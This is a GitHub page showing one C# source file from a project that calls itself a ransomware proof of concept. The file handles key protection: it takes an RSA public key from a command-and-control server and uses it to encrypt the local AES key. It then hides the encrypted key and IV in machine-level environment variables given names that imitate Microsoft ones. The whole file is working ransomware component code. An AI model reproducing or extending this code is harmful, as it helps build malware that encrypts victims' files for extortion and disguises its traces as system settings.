-
Notifications
You must be signed in to change notification settings - Fork 3
/
Copy pathAsymmetricKeyProtection.cs
68 lines (44 loc) · 2.06 KB
/
AsymmetricKeyProtection.cs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
using System;
using System.Collections.Generic;
using System.Text;
using System.Security.Cryptography;
using Microsoft.Win32;
namespace Ilay_sRanomwarePoc
{
public static class AsymmetricProtection
{
private static Byte[] AesKeyPlaintext;
private static RSAParameters PublicKey; //will be retrived from the c&c server
private const string EnvironmentVariableNameKey = "MicrosoftEssentials";
private const string EnvironmentVariableNameIV = "MicrsoftInitializationVector";
static AsymmetricProtection()
{
Communication Socket = new Communication();
PublicKey = RSA.Create().ExportParameters(false);
PublicKey.Modulus = Socket.ServerHello();//setting the servers public rsa key
AesKeyPlaintext = AesEncryption.GetEncryptionPublicKey();
}
public static Byte[] EncryptDataStream(Byte[] Data) //method for encrypting th aes key
{
try
{
RSACryptoServiceProvider Encryptor = new RSACryptoServiceProvider();
Encryptor.ImportParameters(PublicKey);
Byte[] Encrypted = Encryptor.Encrypt(Data, true);
return Encrypted;
}
catch
{
Console.WriteLine("An Error while encrypting aes key");
return null;
}
}
public static void ProtectAesEncryptionKey()
{
string IV = AesEncryption.ConvertByteToString(AesEncryption.GetAesInitializationVector());
string Key = AesEncryption.ConvertByteToString(EncryptDataStream(AesKeyPlaintext));//encrypting aes key using servers public key
Environment.SetEnvironmentVariable(EnvironmentVariableNameKey, Key, EnvironmentVariableTarget.Machine);//saving encrypted key in an environment variable
Environment.SetEnvironmentVariable(EnvironmentVariableNameIV, IV, EnvironmentVariableTarget.Machine);
}
}
}